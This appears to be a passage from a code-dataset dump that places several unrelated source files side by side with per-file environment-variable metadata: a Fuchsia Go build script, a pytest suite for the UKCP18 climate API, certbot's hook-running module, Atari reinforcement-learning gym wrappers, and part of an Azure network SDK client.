# Make a symlink to the src directory or file.
parent = os.path.dirname(dstdir)
if not os.path.exists(parent):
os.makedirs(parent)
os.symlink(src, dstdir)
link_to_source[os.path.join(root_build_dir, dstdir)] = src
else:
# Map individual files since the dependency is only on the
# package itself, not Go subpackages. The only exception is
# 'testdata'.
os.makedirs(dstdir)
for filename in os.listdir(src):
src_file = os.path.join(src, filename)
if filename == 'testdata' or os.path.isfile(src_file):
os.symlink(src_file, os.path.join(dstdir, filename))
link_to_source[os.path.join(
root_build_dir, dstdir, filename)] = src
# Create a sorted list of (link, src) pairs, with longest paths before
# short one. This ensures that 'foobar' will appear before 'foo'.
link_to_source_list = sorted(
link_to_source.items(), key=lambda x: x[0], reverse=True)
cflags = []
if args.sysroot:
cflags.extend(['--sysroot', args.sysroot])
if args.target:
cflags.extend(['-target', args.target])
ldflags = cflags[:]
if args.current_os == 'linux':
ldflags.extend(
[
'-stdlib=libc++',
# TODO(fxbug.dev/64336): the following flags are not recognized by CGo.
# '-rtlib=compiler-rt',
# '-unwindlib=',
])
for dir in args.include_dir:
cflags.extend(['-isystem', dir])
ldflags.extend(['-L' + dir for dir in args.lib_dir])
cflags_joined = ' '.join(cflags)
ldflags_joined = ' '.join(ldflags)
gopath = os.path.abspath(project_path)
build_goroot = os.path.abspath(args.go_root)
env = {
# /usr/bin:/bin are required for basic things like bash(1) and env(1). Note
# that on Mac, ld is also found from /usr/bin.
'PATH': os.path.join(build_goroot, 'bin') + ':/usr/bin:/bin',
# Disable modules to ensure Go doesn't try to download dependencies.
'GO111MODULE': 'off',
'GOARCH': goarch,
'GOOS': goos,
'GOPATH': gopath,
# Some users have GOROOT set in their parent environment, which can break
# things, so it is always set explicitly here.
'GOROOT': build_goroot,
'GOCACHE': args.go_cache,
'CC': args.cc,
'CXX': args.cxx,
'CGO_CFLAGS': cflags_joined,
'CGO_CPPFLAGS': cflags_joined,
'CGO_CXXFLAGS': cflags_joined,
'CGO_LDFLAGS': ldflags_joined,
}
# Infra sets $TMPDIR which is cleaned between builds.
if os.getenv('TMPDIR'):
env['TMPDIR'] = os.getenv('TMPDIR')
if args.cgo:
env['CGO_ENABLED'] = '1'
if args.target:
env['CC_FOR_TARGET'] = env['CC']
env['CXX_FOR_TARGET'] = env['CXX']
go_tool = os.path.join(build_goroot, 'bin', 'go')
if args.vet:
retcode = subprocess.call([go_tool, 'vet', args.package], env=env)
if retcode != 0:
return retcode
cmd = [go_tool]
if args.is_test:
cmd += ['test', '-c']
else:
cmd += ['build', '-trimpath']
if args.verbose:
cmd += ['-x']
if args.tag:
# Separate tags by spaces. This behavior is actually deprecated in the
# go command line, but Fuchsia currently has an older version of go
# that hasn't switched to commas.
cmd += ['-tags', ' '.join(args.tag)]
if args.buildmode:
cmd += ['-buildmode', args.buildmode]
if args.gcflag:
cmd += ['-gcflags', ' '.join(args.gcflag)]
if args.ldflag:
cmd += ['-ldflags=' + ' '.join(args.ldflag)]
cmd += [
'-pkgdir',
os.path.join(project_path, 'pkg'),
'-o',
args.output_path,
args.package,
]
retcode = subprocess.call(cmd, env=env)
if retcode == 0 and args.stripped_output_path:
if args.current_os == 'mac':
retcode = subprocess.call(
[
'xcrun', 'strip', '-x', args.output_path, '-o',
args.stripped_output_path
],
env=env)
else:
retcode = subprocess.call(
[
args.objcopy, '--strip-sections', args.output_path,
args.stripped_output_path
],
env=env)
# TODO(fxbug.dev/27215): Also invoke the buildidtool in the case of linux
# once buildidtool knows how to deal in Go's native build ID format.
supports_build_id = args.current_os == 'fuchsia'
if retcode == 0 and args.dump_syms and supports_build_id:
if args.current_os == 'fuchsia':
with open(dist + '.sym', 'w') as f:
retcode = subprocess.call(
[args.dump_syms, '-r', '-o', 'Fuchsia', args.output_path],
stdout=f)
if retcode == 0 and args.buildidtool and supports_build_id:
if not args.build_id_dir:
raise ValueError('Using --buildidtool requires --build-id-dir')
retcode = subprocess.call(
[
args.buildidtool,
'-build-id-dir',
args.build_id_dir,
'-stamp',
dist + '.build-id.stamp',
'-entry',
'.debug=' + args.output_path,
'-entry',
'=' + dist,
])
if retcode == 0:
if args.depfile is not None:
godepfile_args = [args.godepfile, '-o', dist]
for f, t in link_to_source_list:
godepfile_args += ['-prefixmap', '%s=%s' % (f, t)]
if args.is_test:
godepfile_args += ['-test']
godepfile_args += [args.package]
with open(args.depfile, 'wb') as into:
subprocess.check_call(godepfile_args, env=env, stdout=into)
return retcode
if __name__ == '__main__':
sys.exit(main())
|
[] |
[] |
[
"TMPDIR"
] |
[]
|
["TMPDIR"]
|
python
| 1 | 0 | |
test/test_ukcp18_web_api.py
|
import os
import requests
import time
import xml.etree.ElementTree as ET
from ukcp_api_client.client import UKCPApiClient
API_KEY = os.environ.get('API_KEY', None)
if not API_KEY:
raise Exception('Please define environment variable: "API_KEY"')
BASE_URL = 'https://ukclimateprojections-ui.metoffice.gov.uk'
URL_TEMPLATE = ('{base_url}/wps?'
'Request=Execute&Identifier={proc_id}&Format=text/xml&Inform=true&Store=false&'
'Status=false&DataInputs={data_inputs}&ApiKey={api_key}')
REQUEST_INPUTS = {
'LS1_Plume_01':
('Area=point|245333.38|778933.24;Baseline=b8100;'
'Collection=land-prob;ColourMode=c;DataFormat=csv;FontSize=m;'
'ImageFormat=png;ImageSize=1200;LegendPosition=7;PlotType=PDF_PLOT;'
'Scenario=sres-a1b;TemporalAverage={month};TimeSlice=2050-2069;'
'TimeSliceDuration=20y;Variable=tasAnom;'),
'LS1_Maps_01':
('TemporalAverage=jja;Baseline=b8100;Scenario=rcp45;'
'Area=bbox|-84667.14|-114260.00|676489.68|1230247.30;'
'SpatialSelectionType=bbox;TimeSliceDuration=20y;DataFormat=csv;'
'FontSize=m;Collection=land-prob;TimeSlice=2060-2079;'
'ShowBoundaries=country;Variable=prAnom;ImageSize=1200;ImageFormat=png')
}
def _call_api(proc_id, expect_error_code=-999, **kwargs):
dct = {}
dct['proc_id'] = proc_id
dct['api_key'] = API_KEY
dct['base_url'] = BASE_URL
dct['data_inputs'] = REQUEST_INPUTS[proc_id].format(**kwargs)
url = URL_TEMPLATE.format(**dct)
print('Calling: {}'.format(url))
try:
response = requests.get(url)
except Exception as err:
if err.code == expect_error_code:
return err
raise Exception('Failed with unexpected error: {}\nURL: {}'.format(err, url))
xml_doc = response.text
return url, xml_doc
def _call_api_expect_429(proc_id, **kwargs):
err = _call_api(proc_id, expect_error_code=429, **kwargs)
print('Got required error code: 429')
def _call_api_get_status_url(proc_id, **kwargs):
url, xml_doc = _call_api(proc_id, **kwargs)
root = ET.fromstring(xml_doc)
status_url = root.get("statusLocation", None)
if not status_url:
raise Exception('Could not get valid response for request: {}'.format(url))
return status_url
def test_12_months_via_api():
months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
for month in months:
# Sleep for long enough for all to run
_call_api('LS1_Plume_01', month=month)
time.sleep(30)
def _check_status(xml_doc):
if xml_doc.find('<ProcessSucceeded>The End</ProcessSucceeded>') > -1:
return True
else:
return False
def _poll_status_url(status_url):
# Polls until completion - unless exited
while 1:
time.sleep(5)
response = requests.get(status_url)
xml_doc = response.text
if _check_status(xml_doc):
return xml_doc
def _get_zip_file_url(xml_doc):
for line in xml_doc.split('\n'):
if line.find('.zip</FileURL>') > -1:
zip_url = line.split('>')[1].split('<')[0]
return zip_url
raise Exception('Could not find Zip File location')
def _download_output(url):
# Append API Key
url += '?ApiKey={}'.format(API_KEY)
response = requests.get(url)
output = response.text
def test_single_call():
status_url = _call_api_get_status_url('LS1_Maps_01')
assert(status_url.find(BASE_URL) == 0)
# Wait for completion
xml_doc = _poll_status_url(status_url)
# Check output for zip file URL
zip_url = _get_zip_file_url(xml_doc)
# Test download
_download_output(zip_url)
def test_5_calls():
# Expect to get turned away
for i in range(2):
time.sleep(0.2)
_call_api_get_status_url('LS1_Maps_01')
for i in range(3):
time.sleep(0.2)
_call_api_expect_429('LS1_Maps_01')
def test_fail_when_running():
cli = UKCPApiClient(outputs_dir='my-outputs', api_key=API_KEY)
request_url = 'https://ukclimateprojections-ui.metoffice.gov.uk/wps?' \
'Request=Execute&Identifier=LS3_Subset_01&Format=text/xml&Inform=true&Store=false&' \
'Status=false&DataInputs=TemporalAverage=jan;Area=bbox|474459.24|246518.35|' \
'474459.24|246518.35;Collection=land-rcm;ClimateChangeType=absolute;' \
'EnsembleMemberSet=land-rcm;DataFormat=csv;TimeSlice=2075|2076;Variable=psl'
try:
cli.submit(request_url)
except Exception as err:
last_line = str(err).split('\n')[-1].strip()
assert(last_line == 'The process failed with error message: "UnboundLocalError= ' \
'local variable \'time_index\' referenced before assignment"')
#The process failed with error message: "IndexError= too many indices for array"')
def test_fail_on_submit():
cli = UKCPApiClient(outputs_dir='my-outputs', api_key=API_KEY)
request_url = 'https://ukclimateprojections-ui.metoffice.gov.uk/wps?' \
'Request=Execute&Identifier=Rubbish&Format=text/xml&Inform=true&Store=false'
try:
cli.submit(request_url)
except Exception as err:
assert(str(err) == 'Request failed: InvalidParameterValue: Identifier not found. (None)')
|
[] |
[] |
[
"API_KEY"
] |
[]
|
["API_KEY"]
|
python
| 1 | 0 | |
certbot/hooks.py
|
"""Facilities for implementing hooks that call shell commands."""
from __future__ import print_function
import logging
import os
from subprocess import Popen, PIPE
from certbot import errors
from certbot import util
from certbot.plugins import util as plug_util
logger = logging.getLogger(__name__)
def validate_hooks(config):
"""Check hook commands are executable."""
validate_hook(config.pre_hook, "pre")
validate_hook(config.post_hook, "post")
validate_hook(config.deploy_hook, "deploy")
validate_hook(config.renew_hook, "renew")
def _prog(shell_cmd):
"""Extract the program run by a shell command.
:param str shell_cmd: command to be executed
:returns: basename of command or None if the command isn't found
:rtype: str or None
"""
if not util.exe_exists(shell_cmd):
plug_util.path_surgery(shell_cmd)
if not util.exe_exists(shell_cmd):
return None
return os.path.basename(shell_cmd)
def validate_hook(shell_cmd, hook_name):
"""Check that a command provided as a hook is plausibly executable.
:raises .errors.HookCommandNotFound: if the command is not found
"""
if shell_cmd:
cmd = shell_cmd.split(None, 1)[0]
if not _prog(cmd):
path = os.environ["PATH"]
if os.path.exists(cmd):
msg = "{1}-hook command {0} exists, but is not executable.".format(cmd, hook_name)
else:
msg = "Unable to find {2}-hook command {0} in the PATH.\n(PATH is {1})".format(
cmd, path, hook_name)
raise errors.HookCommandNotFound(msg)
def pre_hook(config):
"Run pre-hook if it's defined and hasn't been run."
cmd = config.pre_hook
if cmd and cmd not in pre_hook.already:
logger.info("Running pre-hook command: %s", cmd)
_run_hook(cmd)
pre_hook.already.add(cmd)
elif cmd:
logger.info("Pre-hook command already run, skipping: %s", cmd)
pre_hook.already = set() # type: ignore
def post_hook(config):
"""Run post hook if defined.
If the verb is renew, we might have more certs to renew, so we wait until
run_saved_post_hooks() is called.
"""
cmd = config.post_hook
# In the "renew" case, we save these up to run at the end
if config.verb == "renew":
if cmd and cmd not in post_hook.eventually:
post_hook.eventually.append(cmd)
# certonly / run
elif cmd:
logger.info("Running post-hook command: %s", cmd)
_run_hook(cmd)
post_hook.eventually = [] # type: ignore
def run_saved_post_hooks():
"""Run any post hooks that were saved up in the course of the 'renew' verb"""
for cmd in post_hook.eventually:
logger.info("Running post-hook command: %s", cmd)
_run_hook(cmd)
def deploy_hook(config, domains, lineage_path):
"""Run post-issuance hook if defined.
:param configuration.NamespaceConfig config: Certbot settings
:param domains: domains in the obtained certificate
:type domains: `list` of `str`
:param str lineage_path: live directory path for the new cert
"""
if config.deploy_hook:
renew_hook(config, domains, lineage_path)
def renew_hook(config, domains, lineage_path):
"""Run post-renewal hook if defined."""
if config.renew_hook:
if not config.dry_run:
os.environ["RENEWED_DOMAINS"] = " ".join(domains)
os.environ["RENEWED_LINEAGE"] = lineage_path
logger.info("Running deploy-hook command: %s", config.renew_hook)
_run_hook(config.renew_hook)
else:
logger.warning(
"Dry run: skipping deploy hook command: %s", config.renew_hook)
def _run_hook(shell_cmd):
"""Run a hook command.
:returns: stderr if there was any"""
err, _ = execute(shell_cmd)
return err
def execute(shell_cmd):
"""Run a command.
:returns: `tuple` (`str` stderr, `str` stdout)"""
# universal_newlines causes Popen.communicate()
# to return str objects instead of bytes in Python 3
cmd = Popen(shell_cmd, shell=True, stdout=PIPE,
stderr=PIPE, universal_newlines=True)
out, err = cmd.communicate()
base_cmd = os.path.basename(shell_cmd.split(None, 1)[0])
if out:
logger.info('Output from %s:\n%s', base_cmd, out)
if cmd.returncode != 0:
logger.error('Hook command "%s" returned error code %d',
shell_cmd, cmd.returncode)
if err:
logger.error('Error output from %s:\n%s', base_cmd, err)
return (err, out)
|
[] |
[] |
[
"PATH",
"RENEWED_DOMAINS",
"RENEWED_LINEAGE"
] |
[]
|
["PATH", "RENEWED_DOMAINS", "RENEWED_LINEAGE"]
|
python
| 3 | 0 | |
Utils/Atari_PPO_training/atari_wrappers.py
|
import numpy as np
import os
os.environ.setdefault('PATH', '')
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class TimeLimit(gym.Wrapper):
def __init__(self, env, max_episode_steps=None):
super(TimeLimit, self).__init__(env)
self._max_episode_steps = max_episode_steps
self._elapsed_steps = 0
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
self._elapsed_steps += 1
if self._elapsed_steps >= self._max_episode_steps:
done = True
info['TimeLimit.truncated'] = True
return observation, reward, done, info
def reset(self, **kwargs):
self._elapsed_steps = 0
return self.env.reset(**kwargs)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if max_episode_steps is not None:
env = TimeLimit(env, max_episode_steps=max_episode_steps)
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
vendor/github.com/Azure/azure-sdk-for-go/arm/network/interfaces.go
|
package network
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
// Changes may cause incorrect behavior and will be lost if the code is
// regenerated.
import (
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/autorest/validation"
"net/http"
)
// InterfacesClient is the the Microsoft Azure Network management API provides
// a RESTful set of web services that interact with Microsoft Azure Networks
// service to manage your network resources. The API has entities that
// capture the relationship between an end user and the Microsoft Azure
// Networks service.
type InterfacesClient struct {
ManagementClient
}
// NewInterfacesClient creates an instance of the InterfacesClient client.
func NewInterfacesClient(subscriptionID string) InterfacesClient {
return NewInterfacesClientWithBaseURI(DefaultBaseURI, subscriptionID)
}
// NewInterfacesClientWithBaseURI creates an instance of the InterfacesClient
// client.
func NewInterfacesClientWithBaseURI(baseURI string, subscriptionID string) InterfacesClient {
return InterfacesClient{NewWithBaseURI(baseURI, subscriptionID)}
}
// CreateOrUpdate the Put NetworkInterface operation creates/updates a
// networkInterface This method may poll for completion. Polling can be
// canceled by passing the cancel channel argument. The channel will be used
// to cancel polling and any outstanding HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface. parameters is parameters supplied to
// the create/update NetworkInterface operation
func (client InterfacesClient) CreateOrUpdate(resourceGroupName string, networkInterfaceName string, parameters Interface, cancel <-chan struct{}) (result autorest.Response, err error) {
if err := validation.Validate([]validation.Validation{
{TargetValue: parameters,
Constraints: []validation.Constraint{{Target: "parameters.Properties", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "parameters.Properties.NetworkSecurityGroup", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "parameters.Properties.NetworkSecurityGroup.Properties", Name: validation.Null, Rule: false,
Chain: []validation.Constraint{{Target: "parameters.Properties.NetworkSecurityGroup.Properties.NetworkInterfaces", Name: validation.ReadOnly, Rule: true, Chain: nil},
{Target: "parameters.Properties.NetworkSecurityGroup.Properties.Subnets", Name: validation.ReadOnly, Rule: true, Chain: nil},
}},
}},
}}}}}); err != nil {
return result, validation.NewErrorWithValidationError(err, "network.InterfacesClient", "CreateOrUpdate")
}
req, err := client.CreateOrUpdatePreparer(resourceGroupName, networkInterfaceName, parameters, cancel)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "CreateOrUpdate", nil, "Failure preparing request")
}
resp, err := client.CreateOrUpdateSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "CreateOrUpdate", resp, "Failure sending request")
}
result, err = client.CreateOrUpdateResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "CreateOrUpdate", resp, "Failure responding to request")
}
return
}
// CreateOrUpdatePreparer prepares the CreateOrUpdate request.
func (client InterfacesClient) CreateOrUpdatePreparer(resourceGroupName string, networkInterfaceName string, parameters Interface, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsJSON(),
autorest.AsPut(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithJSON(parameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// CreateOrUpdateSender sends the CreateOrUpdate request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) CreateOrUpdateSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// CreateOrUpdateResponder handles the response to the CreateOrUpdate request. The method always
// closes the http.Response Body.
func (client InterfacesClient) CreateOrUpdateResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusCreated, http.StatusOK),
autorest.ByClosing())
result.Response = resp
return
}
// Delete the delete netwokInterface operation deletes the specified
// netwokInterface. This method may poll for completion. Polling can be
// canceled by passing the cancel channel argument. The channel will be used
// to cancel polling and any outstanding HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface.
func (client InterfacesClient) Delete(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (result autorest.Response, err error) {
req, err := client.DeletePreparer(resourceGroupName, networkInterfaceName, cancel)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Delete", nil, "Failure preparing request")
}
resp, err := client.DeleteSender(req)
if err != nil {
result.Response = resp
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Delete", resp, "Failure sending request")
}
result, err = client.DeleteResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "Delete", resp, "Failure responding to request")
}
return
}
// DeletePreparer prepares the Delete request.
func (client InterfacesClient) DeletePreparer(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsDelete(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{Cancel: cancel})
}
// DeleteSender sends the Delete request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) DeleteSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client,
req,
azure.DoPollForAsynchronous(client.PollingDelay))
}
// DeleteResponder handles the response to the Delete request. The method always
// closes the http.Response Body.
func (client InterfacesClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusNoContent, http.StatusAccepted, http.StatusOK),
autorest.ByClosing())
result.Response = resp
return
}
// Get the Get network interface operation retrieves information about the
// specified network interface.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface. expand is expand references
// resources.
func (client InterfacesClient) Get(resourceGroupName string, networkInterfaceName string, expand string) (result Interface, err error) {
req, err := client.GetPreparer(resourceGroupName, networkInterfaceName, expand)
if err != nil {
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Get", nil, "Failure preparing request")
}
resp, err := client.GetSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "network.InterfacesClient", "Get", resp, "Failure sending request")
}
result, err = client.GetResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "network.InterfacesClient", "Get", resp, "Failure responding to request")
}
return
}
// GetPreparer prepares the Get request.
func (client InterfacesClient) GetPreparer(resourceGroupName string, networkInterfaceName string, expand string) (*http.Request, error) {
pathParameters := map[string]interface{}{
"networkInterfaceName": autorest.Encode("path", networkInterfaceName),
"resourceGroupName": autorest.Encode("path", resourceGroupName),
"subscriptionId": autorest.Encode("path", client.SubscriptionID),
}
queryParameters := map[string]interface{}{
"api-version": client.APIVersion,
}
if len(expand) > 0 {
queryParameters["$expand"] = autorest.Encode("query", expand)
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}", pathParameters),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare(&http.Request{})
}
// GetSender sends the Get request. The method will close the
// http.Response Body if it receives an error.
func (client InterfacesClient) GetSender(req *http.Request) (*http.Response, error) {
return autorest.SendWithSender(client, req)
}
// GetResponder handles the response to the Get request. The method always
// closes the http.Response Body.
func (client InterfacesClient) GetResponder(resp *http.Response) (result Interface, err error) {
err = autorest.Respond(
resp,
client.ByInspecting(),
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// GetEffectiveRouteTable the get effective routetable operation retrieves all
// the route tables applied on a networkInterface. This method may poll for
// completion. Polling can be canceled by passing the cancel channel
// argument. The channel will be used to cancel polling and any outstanding
// HTTP requests.
//
// resourceGroupName is the name of the resource group. networkInterfaceName
// is the name of the network interface.
func (client InterfacesClient) GetEffectiveRouteTable(resourceGroupName string, networkInterfaceName string, cancel <-chan struct{}) (result autorest.Response, err error) {
req, err := client.GetEffectiveRouteTablePreparer(resourceGroupName, networkInterfaceName, cancel)
if err != nil {
